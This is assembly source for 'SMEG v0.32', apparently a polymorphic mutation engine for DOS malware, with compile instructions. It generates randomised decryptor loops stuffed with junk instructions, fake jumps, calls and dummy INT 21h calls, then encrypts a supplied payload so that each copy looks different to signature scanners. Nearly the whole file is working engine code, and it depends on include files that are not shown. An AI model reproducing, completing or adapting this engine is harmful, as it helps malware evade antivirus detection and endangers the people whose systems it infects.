comment ! Use "TASM /M SMEG.ASM" for compile this!

                warn
                jumps
                locals
                .model  tiny
                .code
                .radix  16
include smeg.asi
;                org     100
include opcode.asi
;                public RND_GET, RND_GET_THREE_BITS, RND_GET_BYTE, RND_INIT, SMEG, SMEG_END
;ENGINEDATASIZE  equ SIZE workbuffer;+4
;
PRODUCTNAME     equ     'SMEG v0.32.'


;
comment #
;
generate_garbage   proc
                   call    RND_INIT                ; generate a random number
                   and     ax,3FF                  ; from 80 to 47F to be the
                   add     ax,80                   ; number of garbage bytes to add
                   mov     cx,ax;[bp.garbage_size]    ; write random bytes
                   mov     di,[bp.targetptr]       ; to the target location

random_gen:
                   call    RND_GET_BYTE
                   stosb
                   loop    random_gen
                   retn
generate_garbage   endp
;
;#
;




;
;
;
;
;
;
; SMEG code begins here                                               
;
;
;
;
;
;
SMEG            proc

                mov     [bp.datasize],cx        ; save length to crypt
                mov     [bp.sourceptr],dx       ; save offset to data to crypt
                mov     [bp.targetptr],di       ; save offset to where to put crypted stuff
;                push    bx si                   ;
                                                ;
                ;lea    bx,[bp.reg0]
                lea    si,[bp.cJMP_patch]
                mov     cx,8                  ; clear the work area with 0's
clear_dataarea:
                mov     [si],ch               ;
                inc     si                    ;
                loop    clear_dataarea         ;

                mov     [bp.initialIP],ax     ; store initial IP

; In the following table, each pair of bits represents a register
; in standard Intel format, i.e. 00 = ax, 01 = cx, 10 = dx, 11 = bx
                lea     bx,[bp.reg0]
                mov     cx,7
illegal_reg0:
;                call    RND_GET_BYTE
;                and     al,7
                call    RND_GET_THREE_BITS
                or      al,2
                cmp     al,2
                je      illegal_reg0
                jmp     ffound

fill_registers1:
                lea     si,[bp.reg0-1]
;                call    RND_GET_BYTE
;                and     al,7
                call    RND_GET_THREE_BITS
fill_registers:
                inc     si
                cmp     si,bx
                je      ffound
                cmp     al,R_SP
                je      fill_registers1
                cmp     al,[si]
                jne      fill_registers
                jmp      short fill_registers1
ffound:

                mov     [bx],al
                inc     bx
                loop    fill_registers1          ; reg0..reg3 = ax, cx, dx, bx

                call    RND_GET_BYTE            ;   X < decriptor_data + initialIP
                mov     [bp.value_X],ax         ;or X > decriptor_data + initialIP + datasize + 2

                call    RND_GET_BYTE            ;   Y < decriptor_data + initialIP - X
                mov     [bp.value_Y],ax         ;or Y > decriptor_data + initialIP + datasize + 2 - X


                mov     cx,[bp.datasize]
                sub     cx,10
invalid_value_J:
                call    RND_GET
                cmp     ax,cx
                ja      invalid_value_J
                inc     ax
                mov     [bp.value_J],ax         ;value_J := 1..datasize-0E

                                                ;
                mov     [bp.useregs],REG_ALL  ;SET USED all registers
                                                ;
;--------------------------------------------------------------------------------------
                call    RND_GET_THREE_BITS           ; do the following from
                or      al,4                    ; 3 to 6 times
                call    garble_more_int21             ;
;--------------------------------------------------------------------------------------
                ;call    encode_routine          ; encode the routine!
;
;  ZMEG       ENCODE CRYPT ROUTINE               
;
;encode_routine  proc

                mov       [bp.useregs],REG_GARBL_ALL        ;SET USED 4..6
;                mov       [bp.CALL_patch],0          ;DON'T ENCODE CALL INTO DECRYPTOR

                lea       si,[bp.dataencriptor]
                mov       cx,4*CRYPTLEVEL
clear_dataencriptor:
                mov       byte ptr [si],_NOP
                inc       si
                loop      clear_dataencriptor
                mov       byte ptr [si],0C3

                call      garble_more_without_call
                mov       al,[bp.reg0]
                call      encode_mov          ;encode MOV IDX ,0
                xor       ax,ax
                stosw

                call      garble_more_without_call
                mov       al,[bp.reg2]        ;encode MOV TMP1, some
                call      encode_mov
                mov       [bp.start_reg2],di
                stosw

                call      garble_more_without_call
                mov       al,[bp.reg3]        ;encode MOV TMP2, some
                call      encode_mov
                mov       [bp.start_reg3],di
                stosw


;                mov       [bp.CALL_patch],0          ;DON'T ENCODE CALL INTO DECRYPTOR
                call      garble_more_without_call
                mov       [bp.loop_top],di

                call      garble_more_without_call
                mov       ax,[bp.value_X]
                call      encode_add

                mov       cl,4; 87 or 8B
                call      encode_reg_mem
                mov       ax,[bp.value_X]
;                add       ax,[bp.value_J]
                neg       ax
                mov       [bp.add_buf_here_1],di
                push      ax                     ;-(X+1)
                stosw

 ;               sto_two_byte 90,90
 ;               sto_two_byte 90,90

                mov       cx,CRYPTLEVEL
encode_crypt_loop:
                push      cx

                mov     [bp.useregs],REG_ENC_ALL        ;SET USED 1..3
                call      encode_one_crypt
;                int 3
                 mov       [bp.useregs],REG_GARBL_ALL        ;SET USED 4..6
                pop       cx
                cmp       cx,(CRYPTLEVEL shr 1) + 1
                jne       no_encode_add_value_Y_here

                call      garble_more_without_call
                mov       ax,[bp.value_Y]
                call      encode_add
no_encode_add_value_Y_here:
                loop      encode_crypt_loop
                mov       [bp.useregs],REG_GARBL_ALL        ;SET USED 4..6


                mov       cl,2; 87 or 89
                call      encode_reg_mem
                pop       ax                     ;-(X+1)
                sub       ax,[bp.value_Y]
                mov       [bp.add_buf_here_2],di
                push      ax                     ;-(X+Y)
                stosw

                call      garble_more_without_call
                pop       ax                     ;-(X+Y)
                sub       ax,[bp.value_J]        ;-(J+X+Y)
                call      encode_add

;
;                 encoding GOTO loop_top
;
                mov     [bp.useregs],REG_GARBL_ALL or REG_ENC ;
                mov     al,72    ;encode JC                     ;
                call    do_cond_jmp2                            ;JC
;                call    not_branch_garble                  ;Shit
                call      many_nonbranch_garble                ;Shit
                mov       ax,[bp.datasize]                     ;
                dec       ax                                   ;
                call      encode_add                           ;ADD INDEX,value_J
                call      finish_cJMP;garble_more              ;
                                                               ;
                mov     al,74    ;encode JZ                     ;JZ
                call    do_cond_jmp2                            ;

;                call    not_branch_garble                  ;Shit
                call    many_nonbranch_garble                  ;Shit
;                call    garble_more                           ;
;;
;  ENCODE JMP NEAR Loop_Top                                    ;
;;
;
                 call    RND_GET_BYTE
;                 mov     ax,2
                and     al,110b
                push    ax
                jz      no_setup
                  mov     cl,1   ;-nechetnoe for use word
                  call    choose_register        ;register for offset loop_top
                  push    ax
                  call    encode_mov             ;al-register, cx-value
                  mov     ax,[bp.loop_top]
                  sub     ax,[bp.targetptr]
                  add     ax,[bp.initialIP]
                  stosw
                  pop     cx
no_setup:
                pop     bx
                call    jmp_table[bx]


;;
                mov       [bp.useregs],REG_ALL        ;;SET USED 0..6
                call      many_nonbranch_garble                  ;Shit
                call      finish_cJMP;garble_more              ;
                call      garble_more                          ;
;;
                                                               ;

;                ret
;encode_routine  endp
;
;  ZMEG  END OF ENCODE CRYPT ROUTINE             
;

;




;--------------------------------------------------------------------------------------
                call    RND_GET_THREE_BITS           ; do the following from
                inc     ax
                call    garble_more_int21             ;
;--------------------------------------------------------------------------------------

pad_paragraph:
                mov     ax,di                   ; pad the decryptor out to the
                sub     ax,[bp.targetptr]       ; nearest paragraph
                and     al,0F                   ; do we need to?
                jz      padded                  ; no, we are done
                cmp     al,0C                   ; otherwise, still a lot to go?
                ja      one_byte_pad            ; no, do one byte at a time
                call    not_branch_garble       ; else do a nonbranching
                jmp     short pad_paragraph     ; instruction

one_byte_pad:
                call    do_one_byte             ;do a random one byte padding instruction
                jmp     short pad_paragraph

padded:
                mov     ax,di
                sub     ax,[bp.targetptr]
 ;               push    ax                ;decryptor_size
                mov     [bp.decryptor_size],ax
                add     ax,[bp.initialIP]
                mov     bx,[bp.add_buf_here_1]
                add     word ptr [bx],ax
                mov     bx,[bp.add_buf_here_2]
                add     word ptr [bx],ax

encrypt:
                cld

                push    di
                mov     si,[bp.sourceptr]
                mov     cx,[bp.datasize]
                rep     movsb


                mov     si,[bp.datasize]
                dec     si
                xor     bx,bx
                call    RND_GET
                xchg    ax,cx
                call    RND_GET
                xchg    ax,dx
                pop     di
;                push    di
next_crypt:

                add     bx,[bp.value_J]
                sub     bx,si
                jnc     no_need_correct
                add     bx,si
no_need_correct:

                mov     ax,[di][bx]
;;;;;;;;;;;;;::::
                call    bp      ;call encryptor
                mov     [di][bx],ax

                and     bx,bx
                jnz     next_crypt

                mov     si,[bp.start_reg2]
                mov     word ptr [si],cx
                mov     si,[bp.start_reg3]
                mov     word ptr [si],dx

;                pop     di
;                add     di,si
;                inc     di

;
;
;                   call    RND_GET_BYTE
;                   xchg    cx,ax
;random_g:
;                   call    RND_GET_BYTE
;                   stosb
;                   loop    random_g
;sto_byte 90
;
;                pop     ax              ;decryptor_size
                mov     ax,[bp.decryptor_size]  ;
                add     ax,[bp.datasize]        ; AX-return code "all size"
;                pop     si bx
                retn
SMEG            endp
;
;











;
encode_mov      proc    ;al-register, (cx-value)
                add     al,0B8h
                stosb
;                xchg    ax,cx
;                stosw
                retn
encode_mov      endp
;




;
encode_reg_mem  proc    ;al-register
                call      garble_more_without_call
                call    RND_GET_BYTE
                and     al,cl           ;cl=2- 87 or 89   mov r,[]
                add     al,87h;b        ;cl=4- 87 or 8B   mov [],r
                mov     ah,[bp.reg1]
                add     ah,ah
                add     ah,ah
                add     ah,ah
                or      ah,[bp.reg0]
                or      ah,10000100b

                cmp     [bp.reg0],R_BX
                je      @@use_bx_as_index
                and     ah,11111101b
@@use_bx_as_index:
                stosw
                ret
encode_reg_mem  endp
;

;
encode_add      proc    ;al-value, add reg0, value
                push    ax
                mov     al,[bp.reg0]
                add     al,0C0h
                mov     ah,al
                mov     al,81h
                stosw
                pop     ax
                stosw
                ret
encode_add      endp
;




;
;stosb_garble_more: stosb
;
garble_more_int21 proc
                xchg    cx,ax                   ;
repeat_garble:
                call    garble_more
;-------------------------------------------
                call    RND_GET_BYTE                 ;
                cmp     al,8C                   ;
                jbe     no_int21                ;
                 and     al,7                   ; encode a dummy int 21
                 add     ax,offset int21fcns-1  ;
                 xchg    si,ax                  ;
                 lodsw                           ;value for mov ah,XX
                 mov     al,0B4                  ;mov ah,XX
                 stosw                           ;
                 sto_two_byte 0Cdh, 21           ;store int 21
no_int21:
;-------------------------------------------
                loop    repeat_garble            ;repeat
                ret
garble_more_int21 endp
;









;
;  ZMEG       ENCODE ONE CRYPT OPERATION         
;
encode_one_crypt proc

        call    RND_GET_BYTE
        and     al,00001110b

        cmp     al,[bp.lastgarble]
        je      encode_one_crypt
        mov     [bp.lastgarble],al
        xchg    ax,bx
        mov     cx,word ptr encrypt_opcode_table[bx]
        neg     bl
        add     bl,sizeof_encrypt_opcode_table-2
        mov     dx,word ptr encrypt_opcode_table[bx]

        and     cl,not 1        ;clear size data flag
        and     dl,not 1        ;clear size data flag
        call    RND_GET_BYTE
        and     al,ch                   ; patch it into the top
        and     al,3                    ; this line unnecessary
        or      cl,al                   ; byte for variable opcodes
        or      dl,al                   ; byte for variable opcodes


        call    choose_register

        and     dh,not MASK R_M
        and     ch,not MASK R_M


        jnz     one_register
         mov     ah,al

        and     al,4    ; rL rH
                        ;
        test    cl,1
        jz      use_byte2
        mov     al,0
use_byte2:
        add     al,[bp.lastchoose] ;lastchoose=1, 2, 3  -1  ax, cx, dx,

        dec     ax    ;al=lastchoose(1,2,3)+(0,4)-1= (0,1,2) or (4,5,6)
        add     ax,ax
        add     ax,ax
        add     ax,ax

        or      ch,ah
        or      dh,al


;;;;IF YOU HAVE ANY TROUBLE - UNCOMMENT THIS;
        and     [bp.useregs],not REG_ENC        ;SET USED 2..3
        ;do not reg1 in r/m field if use two register
;------------------------------------------------------------------

        call    choose_register
one_register:


        or      ch,al
        or      ch,MASK MOD1

        and     al,4    ; rL rH
        test    cl,1
        jz      use_byte1
        mov     al,0
use_byte1:
        add     al,[bp.lastchoose] ;lastchoose=1, 2, 3  -1  ax, cx, dx,

        dec     ax
        or      dh,al
        or      dh,MASK MOD1

        mov     ax,cx

        test    cl,1
        jz      use_byte
        and     dh,11111011b    ;don't use BP, SI, DI
        or      dl,1
use_byte:
        stosw


        sub     si,4
        mov     word ptr [si],dx

        test    cl,01111110b    ;al - high byte of opcode = ch
        jnz     not_need_arg    ; no 80, 81

        call    RND_GET
        stosw
        cmp     cl,81h  ;16 bit
        je      add_two_bytes
        dec     di
        mov     ah,_NOP
add_two_bytes:
        mov     word ptr [si][2],ax
not_need_arg:
         mov       [bp.useregs],REG_GARBL_ALL
garble_more_without_call:
         mov       [bp.CALL_patch],0          ;DON'T ENCODE CALL INTO DECRYPTOR
  ;       call       garble_more
  ;       ret
;         jmp        garble_more
;encode_one_crypt endp
;





;
garble_more:;     proc                   ;don't release as macro
                push    si cx
                call    RND_GET_THREE_BITS

                xchg    cx,ax
                inc     cx
                inc     cx              ;garble count = 2..9
garble_again:
                 push    cx                      ; save garble count
                 call    garble_once             ; garble ***MACRO***
                 pop     cx                      ; restore garble count
                loop    garble_again

                call    finish_cJMP             ; if so, finish it

                call    many_nonbranch_garble   ; garble garble
                mov     bx,[bp.nJMP_patch]      ; check if pending nJMP
                and     bx,bx
                jz      @@retn                    ; if so, keep going

                sto_byte 0C3                 ; encode a RETN

                lea     ax,[di][-2]
                sub     ax,bx
                mov     [bx],ax
                mov     [bp.CALL_patch],bx
                mov     word ptr [bp.nJMP_patch],0
                call    many_nonbranch_garble   ; garble
@@retn:
                pop     cx si
                retn
encode_one_crypt endp

;garble_more     endp
;




;
many_nonbranch_garble proc
                call    RND_GET_THREE_BITS           ; do large instruction
                or      al,4                    ; garble from 4 to 7 times
                xchg    cx,ax
many_nonbranch_garble_loop:
                push    cx
                call    not_branch_garble
                pop     cx
                loop    many_nonbranch_garble_loop
                retn
many_nonbranch_garble endp
;






;
choose_register proc
;
; 1..3 - crypt   registers
; 4..6 - garbage registers
; 0..6 - all     registers
;useregs        01111111b
;                "1" - possible use reg6..reg0
                mov     bl,[bp.useregs]
                call    RND_GET_THREE_BITS            ; get random number

                xchg    cx,ax
                shr     bl,cl
                xchg    cx,ax
                jnc     choose_register
                dec     ax

number_to_register:
                cmp     al,[bp.lastchoose]
                je      choose_register
                mov     [bp.lastchoose],al

                lea     bx,[bp.reg0]
                xlat                            ; get the register number
                                                ; al=0..3, 5..7
                test    cl,1                    ; byte or word register?
                jnz     @@retn                  ; if word, we are okay

                cmp     al,R_SP
                jb      Axbxcxdx                ; is a SI, DI, BP,
                pop     ax
                retn
Axbxcxdx:                                       ; AX, BX, CX, DX
                and     ah,4                    ; change xL to xH
                or      al,ah                   ; make either byte or word register
@@retn:
                retn
choose_register endp
;




;
garble_once     proc
                call    RND_GET
                cmp     ah,0C8                  ; randomly go to either
                ja      branch_garble           ; here ...
;---------------------------------------------------------------------------
not_branch_garble:                              ; ... or here
                call    RND_GET
other_garble:
                cmp     al,0F0
                jae     do_one_byte             ; 1/16 chance
;---------------------------------------------------------------------------
                                                ; mostly do larger instructions
larger_instr:   and     ax,0000000000111110b            ; normalise random number
                cmp     al,[bp.lastgarble]      ; is it the same as before?
                je      not_branch_garble       ; then try again, since we
                                                ; don't want two of the same
                                                ; sort in a row
                mov     [bp.lastgarble],al      ; else remember this one

                add     ax,offset garble_table  ; and process it
                xchg    si,ax
                mov     cx,[si]
                and     cl,not 1
                call    RND_GET_BYTE
                and     al,ch                   ; patch it into the top
                and     al,3                    ; this line unnecessary
                or      cl,al                   ; byte for variable opcodes
                                                ; (e.g. allows byte & word forms of
                                                ; opcode to use the same table entry)
                lea     bx,[bp.reg0]

                and     ch,not MASK R_M            ; clear bottom 3 bits
                jnz     use_one_register


                call    RND_GET_BYTE      ; MOD      ; and register operation
                and     al,MASK MOD1           ; clear all but top 2 bits
                or      ch,al                   ; fill in the field
                rol     al,1
                rol     al,1
                mov     dl,al           ;dl=mod

                cmp     al,11b                  ;if use two register
                jae     no_use_memory
                and     cl,not 1                ; if use memory change to byte data "byte sized"
                                                ; for not MOV AX,[FFFF] ?
no_use_memory:

                call    RND_GET_BYTE       ;R/M      ; generate the registers to use
                and     al,MASK R_M            ; in memory access,i.e. [bx+si]
                or      ch,al                   ; patch into 2nd byte of instr


                cmp     al,110b                 ;R/M=6   ; +2 byte, address in memory
                jne     fill_in_rm              ;

                mov     dl,2                    ;and do not use BP as base register
                and     ch,not MASK MOD1            ;mod := 0,

fill_in_rm:
                call    choose_register
                test    byte ptr [si],00000100b   ; can we use any register?
                jz      one_half_command
                call    RND_GET_THREE_BITS
one_half_command:

                shl     al,1                    ; move register into the reg field
                shl     al,1                    ;Reg field
                shl     al,1                    ;
finish_larger:
                or      ch,al                   ; combine data

                xchg    cx,ax                   ; move it to the right register
                stosw                           ; write the instruction

                and     dl,dl                   ; needs data bytes?
                jz      @@retn
needs_data:
                cmp     dl,3                    ; check length of instruction
                je      @@retn
do_data_bytes:
                call    RND_GET_BYTE                      ; keep the random number
                stosb                           ; write the byte
                dec     dl                      ; decrement bytes to write
                jnz     do_data_bytes

@@retn:         retn
;----------------------------------------------------------------------------
use_one_register:                                      ;shipt operations &
                call    choose_register         ; mov/add/sub/xor/and/or R,XXXX
                xor     dl,dl                   ; no data bytes
                test    byte ptr [si],1
                jnz     finish_larger           ; if shift, not, neg inctruction
                inc     dx                      ; assume byte
                test    cl,1                    ; byte or word of data?
                jz      for_finish_larger           ; continue if so
                inc     dx                      ; INC DX is better!!!
for_finish_larger:
                jmp     short finish_larger     ; otherwise adjust to data
;----------------------------------------------------------------------------
do_one_byte:
                call    choose_register
                cmp     al,0
                jnz     no_use_DAA_AAA_DAS_AAS
                call    RND_GET_BYTE            ; if possible use CX as garbage
                and     al,00011000b
                or      al,00100111b            ;001xx111-27,2f,37,3f
                stosb
                retn

no_use_DAA_AAA_DAS_AAS:
                call    RND_GET_THREE_BITS

                lea     bx,[onebyte_table]
                xlat
                cmp     al,48                   ; DEC or INC ??
                ja      encode_1byte            ; all other onebyte command have opcode great 48h
inc_or_dec:
                xchg    cx,ax
                inc     cx                      ;cl - 41 or 49 for 'use word'
                call    choose_register
                add     al,cl
                dec     ax                      ;restore INC/DEC opcode
encode_1byte:   stosb
                retn
;----------------------------------------------------------------------------
branch_garble:
                cmp     word ptr [bp.cJMP_patch],0 ; is there an unfinished
                jnz     finish_cJMP             ; if so, finish it
                call    RND_GET
                cmp     ah,6Eh
                ja      do_near_JMP
do_cond_jmp:
                and     al,00001111b            ; encode a conditional jmp
                or      al,01110000b            ; opcode 70..7F
;                cmp     ah,40
;                jb      do_cond_jmp2
                push    ax
                mov     cl,1                    ; use word
                call    choose_register
                cmp     al,R_CX
                pop     ax
                jne     do_cond_jmp2
                                                ; if possible use CX as garbage
                and     al,00000011b            ; encode a conditional loop/jcxz
                or      al,11100000b            ; opcode E0..E3
do_cond_jmp2:
                stosb
                mov     [bp.cJMP_patch],di      ; save target offset
                stosb
                retn
;----------------------------------------------------------------------------
do_near_JMP:
;never     ;
                cmp     word ptr [bp.nJMP_patch],0 ; is there an unfinished
                jnz     do_cond_jmp             ; near JMP pending?

                cmp     al,0B4h                 ; either just jmp past
                jbe     encode_CALL             ; or call it too
;----------------------------------------------------------------------------
                sto_byte 0E9
                mov     [bp.nJMP_patch],di      ; save location to patch
                stosw

                call    RND_GET_BYTE
                cmp     al,0AA
                ja     not_branch_garble
;----------------------------------------------------------------------------
forward_CALL:
                cmp     word ptr [bp.last_CALL],0 ; is there a garbage CALL
                je      not_branch_garble         ; we can patch?

                push    di                        ; if there is, patch the CALL
                xchg    di,ax                     ; for here so there are CALLs
                dec     ax                        ; forwards as well as back-
                dec     ax                        ; wards
                mov     di,[bp.last_CALL]
                sub     ax,di
                stosw
                pop     di
                jmp     not_branch_garble
;----------------------------------------------------------------------------
encode_CALL:
                cmp     word ptr [bp.CALL_patch],0 ; is there one pending?
                je      do_cond_jmp

                sto_byte 0E8
                cmp     word ptr [bp.last_CALL],0
                je      store_CALL_loc

                call    RND_GET_BYTE                 ; 1/2 chance of replacing
                cmp     al,80                   ;
                jae     fill_in_offset
store_CALL_loc:
                mov     [bp.last_CALL],di       ; save ptr to CALL offset
fill_in_offset:
                mov     ax,[bp.CALL_patch]      ; calculate CALL offset
                sub     ax,di
                stosw
                retn
garble_once     endp
;




;
; finish_cJMP simply encodes a few instructions between the conditional
; jmp and its target, and then sets the destination of the jmp to be after
; the inserted instructions.
;
finish_cJMP     proc
                mov     ax,di                   ; get current location
                mov     bx,[bp.cJMP_patch]      ; get previous location
                and     bx,bx                   ; in not open cJmp
                jz      @@retn                  ; cJMP_patch == 0? i.e. is
                sub     ax,bx                   ; there an unfinished cJMP?
                dec     ax                      ; calculate offset
                jnz     @@1                     ; if nothing in between,
                call    not_branch_garble       ; fill in some instructions
                jmp     short finish_cJMP       ; and do this again
@@1:
                cmp     al,7F                   ; are we close enough?
                jbe     @@2                     ; if so, finish this now
                xor     al,al                   ; if not, encode cJMP $+2
@@2:
                mov     [bx],al                 ; patch the cJMP destination
                mov     word ptr [bp.cJMP_patch],0 ; clear usage flag
@@retn:         retn
finish_cJMP     endp
;








;
jmp_table       dw      jmp0;-jmp_table
                dw      jmp1;-jmp_table
                dw      jmp2;-jmp_table
                dw      jmp3;-jmp_table
;
jmp0:           mov     al,0E9                  ; encode a JMP
                stosw                           ; (with word offset)
                scasb; inc di                   ;ax:=loop_top-di-2
                mov     ax,[bp.loop_top]        ; calculate offset to
                sub     ax,di                   ; top of decryption loop
                mov     [di][-2],ax             ; adjust for jmp instruction
                retn                            ; of forwards
;----------------------------------------------------------------------------
jmp2:           mov     al,50                   ; encode PUSH reg
                or      al,cl
                stosb
;                call    stosb_garble_some             ; garble a bit
;                push    cx
;                call    garble_once             ; garble a bit
;                pop     cx
;                call     RND_GET
;                call     do_one_byte
                call    many_nonbranch_garble   ; garble
                mov     al,0c3                  ; encode RETN
                stosb
                retn
;----------------------------------------------------------------------------
jmp3:           sto_byte 0E                   ; encode PUSH CS
;                call    many_nonbranch_garble   ; garble
                call    jmp2
                sub     byte ptr [di][-1],0c3-0CBh;change RETN to RETF
                retn
;----------------------------------------------------------------------------
jmp1:           mov     ax,0E0FF                ; encode JMP register
                or      ah,cl
                stosw
                retn
;
;jmpF          add cx,cx
;              loop XX



include randomiz.asi

Opcode_Table
SMEG_END:
data_area       db       SIZE workbuffer dup (?)
 ;               dd       (?)
;target_area:

                end
-------------------------------
